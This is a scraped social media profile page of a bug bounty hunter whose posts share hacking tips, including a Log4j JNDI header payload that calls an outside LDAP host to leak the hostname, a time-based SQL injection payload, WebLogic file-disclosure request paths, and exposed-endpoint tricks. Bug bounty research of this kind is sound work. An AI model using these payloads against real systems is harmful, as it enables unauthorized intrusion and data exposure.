Log inSign up
Ravindra Lakhara🇮🇳
1,599 posts
Image
user avatar
Ravindra Lakhara🇮🇳
@RootxRavi
BSCP | CREST CPSA & CRT | OSCP | CRTA | CRTP | eJPT | eCPPTv2 | eWPTX | eMAPT | Yogosha 20 | Bugcrowd 200 | Open for freelance project
India
bugcrowd.com/RootxRavi
Joined October 2022
559
Following
5,259
Followers

New to X?

Sign up now to get your own personalized timeline!

Create account

By signing up, you agree to the Terms of Service and Privacy Policy, including Cookie Use.

Terms·Privacy·Cookies·Accessibility·Ads Info·© 2026 X Corp.
Don't miss what's happening
People on X are the first to know.
Log inSign up
  • Pinned
    user avatar
    Ravindra Lakhara🇮🇳
    @RootxRavi
    Mar 31
    Proud to share that I’ve successfully cleared the BSCP exam by @PortSwigger. A great milestone in my cybersecurity journey!
    Image
    1.6K
  • user avatar
    Ravindra Lakhara🇮🇳
    @RootxRavi
    Nov 27, 2022
    Easy P1 🙃 1: Collect all the Js files by using the developer tool on mozila 2: Run Link Finder Tool on that JS files which you got from dev tool or use Js Miner tool 3: Now check manually sensitive keyword js file #bugbounty #bugbountytips #security
    Image
  • user avatar
    Ravindra Lakhara🇮🇳
    @RootxRavi
    Mar 19, 2024
    Easy P1 🔥 Add to your wordlist /ganglia/ /ganglia/?c=ElastiCluster&m=load_one&r=hour&s=by%20name&hc=4&mc=2 #bugbountytips #bugbounty #security
    Image
    47K
  • user avatar
    Ravindra Lakhara🇮🇳
    @RootxRavi
    Mar 21, 2024
    Log4j 🙌 Application was running java Vulnerable header : X-Forwarded-For: ${jndi:ldap://${:-874}${:-705}.${hostName}.xforwardedfor.<Server-link>} #BugBounty #bugbountytips #Security
    Image
    42K
  • user avatar
    Ravindra Lakhara🇮🇳
    @RootxRavi
    Dec 7, 2022
    🙃 1: Gather all the POST parameters using @BurpBounty Pro Extension or using Param Miner Tool 2: Use SQLmap or intruder list on each parameter Payload : (select*from(select(sleep(5)))a) #bugbountytips #bugbounty #hacking #pentesting
    Image
  • user avatar
    Ravindra Lakhara🇮🇳
    @RootxRavi
    Jan 30, 2023
    Just scored a 4 Digit Bounty on @YogoshaOfficial 1 : Get all the URL from wayback / Gau 2 : Filter out the js file using httpx 3 : Check Mnauly all the js file or you can use nuclei template or used @trufflesec chrome extension #BugBounty #bugbountytips
    Image
    31K
  • user avatar
    Ravindra Lakhara🇮🇳
    @RootxRavi
    Mar 23, 2024
    A new Tool Added in @recon_sage! Introducing Fast Subdomain Scanner 🚀 Scan subdomains for a domain in a click for FREE! Tool link in the comments:
    Image
    00:00
    58K
  • user avatar
    Ravindra Lakhara🇮🇳
    @RootxRavi
    Aug 16, 2023
    Oracle WebLogic Server LFI #Bogbounty #bugbountytips #bugbountytip Payload used : GET .//META-INF/MANIFEST.MF GET .//WEB-INF/web.xml GET .//WEB-INF/portlet.xml GET .//WEB-INF/weblogic.xml
    Image
    24K
  • user avatar
    Ravindra Lakhara🇮🇳
    @RootxRavi
    Mar 28, 2023
    Easy P1 😀 #bugbountytips #bugbounty Endpoint /elmah /ELMAH or you can use the below Template to find out the issue github.com/projectdiscove…
    Image
    Image
    19K
  • user avatar
    Ravindra Lakhara🇮🇳
    @RootxRavi
    Nov 6, 2024
    I earned $10,000 for my submission on @bugcrowd bugcrowd.com/rootxravi #ItTakesACrowd
    13K
  • user avatar
    Ravindra Lakhara🇮🇳
    @RootxRavi
    Aug 20, 2023
    Thank you @Bugcrowd 🤩 #BugBounty #Security
    Image
    21K
  • user avatar
    Ravindra Lakhara🇮🇳
    @RootxRavi
    Sep 22, 2023
    3 RCE on the VDP program - Found that the website is using the Oracle WebLogic Server - Nuclei template used: CVE-2019-2729.yaml - For exploitation: github.com/rootedshell/We… #BugBounty #bugbountytips #bugbountytip
    Image
    Image
    25K
  • user avatar
    Ravindra Lakhara🇮🇳
    @RootxRavi
    Jan 6, 2023
    Account Takeover Tricks via Password Reset #bugbountytips #BugBounty
    Image
    8.8K
  • user avatar
    Ravindra Lakhara🇮🇳
    @RootxRavi
    Apr 17, 2025
    I earned $2500 + $800 for my submission on @Bugcrowd bugcrowd.com/RootxRavi #ItTakesACrowd
    5.5K
Advertisement
Advertisement